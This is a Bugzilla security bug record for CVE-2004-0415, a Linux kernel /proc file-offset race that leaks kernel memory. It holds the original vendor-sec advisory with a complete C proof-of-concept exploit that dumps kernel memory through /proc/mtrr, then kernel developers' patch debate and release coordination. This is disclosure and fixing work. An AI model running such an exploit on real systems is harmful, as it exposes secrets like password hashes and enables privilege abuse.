Bugzilla – Bug 56074
VUL-0: CVE-2004-0415: kernel: /proc info leak
Last modified: 2021-10-04 08:49:20 UTC
Date: Mon, 24 May 2004 13:52:43 +0200 (CEST) From: Paul Starzetz <ihaquer@isec.pl> Reply-To: isec@isec.pl To: vendor-sec <vendor-sec@lst.de> Subject: [vendor-sec] Proc leaks -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Synopsis: Linux kernel file system signedness issues Product: Linux kernel Version: 2.4 up to to and including 2.4.26, 2.6 up to to and including 2.6.6 Vendor: http://www.kernel.org/ URL: http://isec.pl/vulnerabilities/ ? CVE: not assigned Author: Paul Starzetz <ihaquer@isec.pl> Date: May 24, 2004 Issue: ====== A critical security vulnerability has been found in the Linux kernel while handling file offset pointers. Details: ======== The Linux kernel offers a file handling API to the applications. Basically a file can be identified by a file name and opened through the open(2) system call which in turn returns a file descriptor for the file ressource. One of the properties of a file is also something called 'file offset' which is advanced if one reads or writtes to the file. It can also by changed through the lseek(2) system call and identifies the current writing/reading position. There are two different versions of the file handling API inside the kernel: the old 32 bit and the new (LFS) 64 bit API. We have identified numerous places where invalid conversions from 64 bit sized file offsets to 32 bit ones. We have found that most of the /proc entries (like /proc/version) leaks about one page of unitialized kernel memory and can be used to obtain sensitive data. We have found a dozen of places with suspicious or bogus code. One of them resides in the MTRR handling code for the i386 architecture: static ssize_t mtrr_read (struct file *file, char *buf, size_t len, loff_t *ppos) { [1] if (*ppos >= ascii_buf_bytes) return 0; [2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos; if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT; [3] *ppos += len; return len; } /* End Function mtrr_read */ It is quite easy to see that since copy_to_user can sleep, the second reference to *ppos may use another value. To conclude: code operating on the file->f_pos variable through a pointer must be atomic in respect to the current thread. We expect more troubles in the SMP case though. Exploitation: ============= In the following we want to concentrate onto the mttr.c code, however we think that also other pieces of the kernel code may be exploitable. The idea is to use the blocking property of copy_to_user to advance the file->f_pos file offset to be negative allowing us to bypass the two checks marked with [1] and [2] in the above code. The idea is to use the blocking property of copy_to_user to advance the file->f_pos file offset to be negative allowing us to bypass the two checks marked with [1] and [2] in the above code. There are two situation where copy_to_user() will sleep if there is no page table entry for the corresponding location in the user buffer: - - the underlying buffer maps a file which is not in the page cache. The file must be first rwad from the disk - - the mmap_sem of the process is in a closed state, that means another thread sharing the same VM caused a down_write on the semaphore. We use the second method as follows. One of two threads sharing same VM issues a madvise(2) call on a VMA that maps some, sufficiently big file setting the madvise flag to WILLNEED. This will issue a down_write on the mmap semaphore and schedule a read-ahead request for the mmaped file. Second thread issues in the mean time a read on the /proc/mtrr file thus going for sleep until the first thread returns from the madvise system call. The threads will be woken up in a FIFO manner thus the first thread will run as first and can advance the file pointer of the proc file to the maximum possible value of 0x7fffffffffffffff while the second thread is still waiting in the scheduler queue for CPU. After the place marked with [3] has been executed, the file position will have a negative value and the checks [1] and [2] can be passed for any user buffer length thus leaking the kernel memory from the address of ascii_buffer on. We have attached a proof-of-concept exploit code. Impact: ======= Since no special privileges are required to open the /proc/mtrr file for reading any process may exploit the bug to read huge parts of kernel memory. The kernel memory dump may include very sensitive information like hashed passwords from /etc/shadow or even the root passwort. We have found that after the root user logged in using ssh, the root passwort was keept in kernel memory. This is very surprising since sshd will quickly clean the memory containing the supplied password. But the password may have made its way through various kernel paths like pipes or sockets. Tested and known to be vulnerable kernel versions are all <= 2.4.26 and <= 2.6.5. All users are encouraged to patch all vulnerable systems as soon as appropriate vendor patches are released. There is no hotfix for this vulnerability. Credits: ======== Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS. Disclaimer: =========== This document and all the information it contains are provided "as is", for educational purposes only, without warranty of any kind, whether express or implied. The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liability claims regarding damage caused by the use of any information provided, including any kind of information which is incomplete or incorrect, will therefore be rejected. Appendix: ========= /* * * /proc ppos kernel memory read * * the semaphore method * * by IhaQueR * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <fcntl.h> #include <time.h> #include <sched.h> #include <sys/socket.h> #include <sys/select.h> #include <sys/time.h> #include <sys/mman.h> #include <linux/unistd.h> #include <asm/page.h> // machine mem size in MB #define MEMSIZE64 _syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res, uint, wh); void fatal(const char *msg) { printf("\n"); if(!errno) { fprintf(stderr, "FATAL: %s\n", msg); } else { perror(msg); } printf("\n"); fflush(stdout); fflush(stderr); exit(1); } static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE, size=PAGE_SIZE, us; static volatile int go[2]; static loff_t off; static char *buf=NULL, *file, child_stack[PAGE_SIZE]; static struct timeval tv1, tv2; static struct stat st; // child close sempahore & sleep int start_child(void *arg) { // unlock parent & close semaphore go[0]=0; madvise(file, csize, MADV_DONTNEED); madvise(file, csize, MADV_SEQUENTIAL); gettimeofday(&tv1, NULL); read(pfd, buf, 0); go[0]=1; r = madvise(file, csize, MADV_WILLNEED); if(r) fatal("madvise"); // parent blocked on mmap_sem? GOOD! if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) { r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET); if( r == -1 ) fatal("lseek"); printf("\n[+] Race won!"); fflush(stdout); go[0]=2; } else { printf("\n[-] Race lost %d, use another file!\n", go[1]); fflush(stdout); kill(getppid(), SIGTERM); } _exit(1); return 0; } void usage(char *name) { printf("\nUSAGE: %s <file not in cache>", name); printf("\n\n"); exit(1); } int main(int ac, char **av) { if(ac<2) usage(av[0]); // mmap not cached file r=stat(av[1], &st); if(r) fatal("stat file"); csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1); fd=open(av[1], O_RDONLY); if(fd<0) fatal("open file"); file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0); if(file==MAP_FAILED) fatal("mmap"); close(fd); printf("\n[+] mmaped uncached file at %p - %p", file, file+csize); fflush(stdout); // open proc file pfd=open("/proc/mtrr", O_RDONLY); if(pfd<0) fatal("open"); // open storage file fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644); if(fd<0) fatal("open data"); // truncate to memsize r=ftruncate(fd, fsize); if(r<0) fatal("ftruncate"); buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if(buf==MAP_FAILED) fatal("mmap"); close(fd); printf("\n[+] mmaped kernel data file at %p", buf); fflush(stdout); // clone thread wait for child sleep nc = nice(0); cpid=clone(&start_child, child_stack + sizeof(child_stack)-4, CLONE_FILES|CLONE_VM, NULL); nice(19-nc); while(go[0]==0) { i++; } // try to read & sleep & move fpos to be negative gettimeofday(&tv1, NULL); go[1] = 1; r = read(pfd, buf, size ); go[1] = 2; gettimeofday(&tv2, NULL); if(r<0) fatal("read"); while(go[0]!=2) { i++; } us = tv2.tv_sec - tv1.tv_sec; us *= 1000000; us += (tv2.tv_usec - tv1.tv_usec) ; printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout); r = _llseek(pfd, 0, 0, &off, SEEK_CUR); if(r < 0 ) { printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n"); fflush(stdout); i=0; for(;;) { r = read(pfd, buf, PAGE_SIZE ); if(r!=PAGE_SIZE) break; buf += PAGE_SIZE; i++; printf("\r PAGE %6d", i); fflush(stdout); } printf("\n[+] done, err=%s", strerror(errno) ); fflush(stdout); } close(pfd); printf("\n"); sleep(1); kill(cpid, 9); return 0; } - -- Paul Starzetz iSEC Security Research http://isec.pl/
<!-- SBZ_reproduce --> ...
CAN-2004-0415
CDR: Tuesday, June 29th, 16:00 MEST
Do we have fixes for this problem?
Not so far. But people start working on it...
I am willing to accept a (tested) patch last minute before Goldmaster for this. My Goldmaster is June 30th, so this would work. But keep in mind that we give our partners our current kernels, so this should be checked in last minute (June 28th/28th).
I'm currently in the process of preparing the 2.4 based update kernels. Since release date is June, 29th, I really urgently need the fix. And of course we also need it for SLES9 GA...
fixing this issue seems not to be easy... (see vendor-sec@)
Thomas, can you put the vendor-sec discussion somewhere where I can read it? Thanks?
Created attachment 21716 [details] vendor-sec discussion
Created attachment 21755 [details] forwarded by Alan Cox, work from Al Viro, needs review.
From: Solar Designer <solar@openwall.com> To: vendor-sec@lst.de Date: Tue, 29 Jun 2004 00:18:33 +0400 Subject: [vendor-sec] workaround for the f_pos races Parts/Attachments: 1 Shown 55 lines Text 2 OK 139 lines Text ---------------------------------------- Hi, The patch Alan has posted looks good, but it's clear that in a patch this large there must be bugs. And it probably still misses some broken read/write routines. I'd like to propose an alternative approach which, when implemented cleaner than in the attached patch, might be more appropriate for preliminary vendor updates which are to be released in a matter of days (if not hours). I went ahead and introduced a mutex into struct file and I'm using the mutex to serialize all seek/read/write activity on a given fd. I've verified that my patch defeats Paul's mtrr exploit. It still thinks it wins the race, but the resulting kmem dump does not contain anything but the usual /proc/mtrr data: david!sources:/tmp$ ./isec-mtrr-ppos /usr/lib/librpm-4.2.so [+] mmaped uncached file at 0x25f000 - 0x3eb000 [+] mmaped kernel data file at 0x40000000 [+] Race won! [+] READ 0 bytes in 13946 usec david!sources:/tmp$ strings kmem.dat reg00: base=0x00000000 ( 0MB), size= 512MB: write-back, count=1 reg01: base=0x20000000 ( 512MB), size= 256MB: write-back, count=1 david!sources:/tmp$ Known disadvantages of this approach: - it breaks binary compatibility with old kernel modules (although in practice old modules will just work most of the time, -- mine do), but this happens between kernel releases anyway; - it might break some third-party kernel patches which allocate new struct file's, but won't know to initialize the mutex; - the serialization is more strict than was absolutely necessary to avoid the security issue (but is this a disadvantage?) Known problems with the patch in its present form: - it does not honor O_NONBLOCK when concurrent calls for the same fd are made by different threads of an application; - not all instances of ->{read,write} are covered, -- most of the remaining probably can't be triggered, -- for example, those in binary loaders shouldn't be triggerable since there's no fexec(), -- but there're some which need to be patched too (those which pertain to 32-bit syscall emulation on 64-bit platforms). Thoughts? -- /sd
Created attachment 21757 [details] from Solar designer via vendor-sec.
From: viro@parcelfarce.linux.theplanet.co.uk To: Solar Designer <solar@openwall.com> Cc: vendor-sec@lst.de Date: Mon, 28 Jun 2004 21:55:48 +0100 Subject: Re: [vendor-sec] workaround for the f_pos races On Tue, Jun 29, 2004 at 12:18:33AM +0400, Solar Designer wrote: > I went ahead and introduced a mutex into struct file and I'm using the > mutex to serialize all seek/read/write activity on a given fd. > Thoughts? You'll never get that merged upstream. It's a huge overkill and it _still_ doesn't solve the problems with broken wraparound checks, etc. Said problems are much more widespread than race-related "how to get negative offset" stuff - just check the patch. Moreover, for absolute majority of instances we don't need any locks at all, since these guys do not accept offsets past 4Gb, making updates of offset atomic for all practical purposes. _______________________________________________
From: Alan Cox <alan@lxorguk.ukuu.org.uk> To: Solar Designer <solar@openwall.com> Cc: vendor-sec@lst.de Date: Mon, 28 Jun 2004 21:04:23 +0100 Subject: Re: [vendor-sec] workaround for the f_pos races On Llu, 2004-06-28 at 21:18, Solar Designer wrote: > I went ahead and introduced a mutex into struct file and I'm using the > mutex to serialize all seek/read/write activity on a given fd. > - it does not honor O_NONBLOCK when concurrent calls for the same fd > are made by different threads of an application; You get deadlocks as well as killing system performance. I really do think there is a case for a set of helpers here for many of the users (and actually for a lot conversion to seq_* as recommended by Al would fix them). A lot of the drivers would benefit from a simple set of lseek/read/write helpers. I might try and make the case for that with Linus after the panic is over. _______________________________________________
From: Solar Designer <solar@openwall.com> To: viro@parcelfarce.linux.theplanet.co.uk Cc: vendor-sec@lst.de Date: Tue, 29 Jun 2004 01:13:28 +0400 Subject: Re: [vendor-sec] workaround for the f_pos races On Mon, Jun 28, 2004 at 09:55:48PM +0100, viro@parcelfarce.linux.theplanet.co.uk wrote: > On Tue, Jun 29, 2004 at 12:18:33AM +0400, Solar Designer wrote: > > I went ahead and introduced a mutex into struct file and I'm using the > > mutex to serialize all seek/read/write activity on a given fd. > > > Thoughts? > > You'll never get that merged upstream. I guess so. But it's a pity. Another interesting test case: 3< large_uncached_file_on_disk cat <&3 > f1_on_tmpfs & cat <&3 > f2_on_tmpfs & wait wc -c f?_on_tmpfs With an unpatched kernel, the sum of sizes of f1 and f2 will usually exceed the size of the original file, -- in my tests, by as much as 50%. This feels wrong. With my patch, the sum of sizes of f1 and f2 exactly matches the size of large_uncached_file_on_disk. > It's a huge overkill I disagree. I actually have a candidate application relying on the above property, -- which I once thought the kernel guaranteed... > and it _still_ > doesn't solve the problems with broken wraparound checks, etc. Yes, it's against the races only. As for broken wraparound checks, I think we may add wraparound checks at this same higher layer once we have the locks. Simply not call f_op->read() with arguments which would wraparound; instead, we can decrease the count for the call. I just don't want to rely on hundreds of individual implementations to be correct, -- I want to trap invalid input early on. > Said problems > are much more widespread than race-related "how to get negative offset" > stuff - just check the patch. OK, I trust you on this. > Moreover, for absolute majority of instances > we don't need any locks at all, since these guys do not accept offsets > past 4Gb, making updates of offset atomic for all practical purposes. You're assuming that the underlying f_ops are correct and don't load *ppos multiple times, -- which we know was not the case and will not be the case for many drivers which are yet to be developed by others. You're also only talking of the security aspect of it, -- but some of it is about correctness, not only security. See my example above. Introducing locks at the higher layer like I did eliminates races even for those poor f_ops which load *ppos multiple times. -- /sd
I don't wrap this up into an attachment for speed. From: Alan Cox <alan@lxorguk.ukuu.org.uk> To: Solar Designer <solar@openwall.com> Cc: viro@parcelfarce.linux.theplanet.co.uk, vendor-sec@lst.de Date: Mon, 28 Jun 2004 21:28:46 +0100 Subject: Re: [vendor-sec] workaround for the f_pos races On Llu, 2004-06-28 at 22:13, Solar Designer wrote: > I disagree. I actually have a candidate application relying on the > above property, -- which I once thought the kernel guaranteed... I had that argument with Al yesterday and having been over SUSv2 the only thing it really has a lot to say on is O_APPEND, which does seem buggered on UDF. The wrap check has the problem we don't know _what_ the wrapping limit for the code is - 2Gb, 4Gb, 2^63 and 2^62 all appear, as does 2^16 bytes! - thus a helper function can do good stuff here but not top level code _______________________________________________
From: viro@parcelfarce.linux.theplanet.co.uk To: Solar Designer <solar@openwall.com> Cc: vendor-sec@lst.de Date: Mon, 28 Jun 2004 22:29:43 +0100 Subject: Re: [vendor-sec] workaround for the f_pos races On Tue, Jun 29, 2004 at 01:13:28AM +0400, Solar Designer wrote: > Another interesting test case: > > 3< large_uncached_file_on_disk > cat <&3 > f1_on_tmpfs & > cat <&3 > f2_on_tmpfs & > wait > wc -c f?_on_tmpfs > > With an unpatched kernel, the sum of sizes of f1 and f2 will usually > exceed the size of the original file, -- in my tests, by as much as 50%. > This feels wrong. > > With my patch, the sum of sizes of f1 and f2 exactly matches the size > of large_uncached_file_on_disk. > > > It's a huge overkill > > I disagree. I actually have a candidate application relying on the > above property, -- which I once thought the kernel guaranteed... ... until you went and checked it on some Unices and found that your assumption was more than just "not guaranteed", it was actually wrong on quite a few of them. Correct? Which makes any software relying on such assumption immediately broken. FWIW, anybody who mixes read() and lseek() on the same descriptor without logics in their code serializing those are also getting what they'd asked for - GIGO. It should not break the kernel, obviously, but kernel has no business being nice to inherently racy userland code. BTW, you do realize that lseek() in the middle of read() on the same descriptor will be lost? On regular files, on quite a few Unices, Linux included. IMNSHO, aside of security problem in the kernel it's a case of "Doctor, It Hurts When I Do It". _______________________________________________
From: Solar Designer <solar@openwall.com> To: Alan Cox <alan@lxorguk.ukuu.org.uk> Cc: vendor-sec@lst.de Date: Tue, 29 Jun 2004 01:29:27 +0400 Subject: Re: [vendor-sec] workaround for the f_pos races On Mon, Jun 28, 2004 at 09:04:23PM +0100, Alan Cox wrote: > On Llu, 2004-06-28 at 21:18, Solar Designer wrote: > > - it does not honor O_NONBLOCK when concurrent calls for the same fd > > are made by different threads of an application; Actually, upon a second thought I realize that O_NONBLOCK is a non-issue. I can explain why not if needed. > You get deadlocks Would you care to illustrate that by an example? I don't think I ever have a thread try to acquire a second f_pos_lock when already holding one (on a different file). I see no room for deadlocks here. But I might be missing something. > as well as killing system performance. I don't think this has a performance impact other than that associated with the few extra assembly instructions executed to acquire and release locks. By far most of the time the locks will be acquired immediately. The only way there can be a delay is when another thread is playing with the same fd in a manner which would change f_pos, -- that's already not normal given that Linux's behavior in that case is pretty much undefined as illustrated by the example in my previous e-mail. But even then it's just increased latency for the pair of operations on the fd. Yes, they won't execute in parallel on SMP (instead, a CPU will be available for use by other processes), -- but what use is parallel execution if the end result would be undefined? > I really > do think there is a case for a set of helpers here for many of the users > (and actually for a lot conversion to seq_* as recommended by Al would > fix them). > > A lot of the drivers would benefit from a simple set of lseek/read/write > helpers. I might try and make the case for that with Linus after the > panic is over. I wonder what kind of helpers you have in mind here. Care to provide an example? Thanks, -- /sd _______________________________________________
creating attachment with preliminary patch against 2.4 kernels.
Created attachment 21767 [details] preliminary, from Al Viro, against 2.4 kernels.
We have reviewed the complete patch (two people for each change), sent out observations upstream, and received an update from Alan Cox. I have found a few additional problems in the update. Building test kernels now; to me it's not entirely clear how we will go about testing this, yet.
4. august seems to be the new coordinated release date.
Fix is in all our trees now except SLES7. Which is no longer maintained AFAIK.
CRD: 3rd. August, 19:00 MEST
packages approved (expect for s390*)
<!-- SBZ_reopen -->Reopened by draht@suse.de at Tue Aug 10 18:51:13 2004, took initial reporter krahmer@suse.de to cc
Re-opening, for possible missed /proc files in patch. Waiting for Helmut...
Closing... Helmut has found that the file /proc/kcore doesn't have the fix. Cannot be considered security-relevant, though, for DAC checks on that file, and for the actual purpose of the file: To provide kernel memory.
CVE-2004-0415: CVSS v2 Base Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)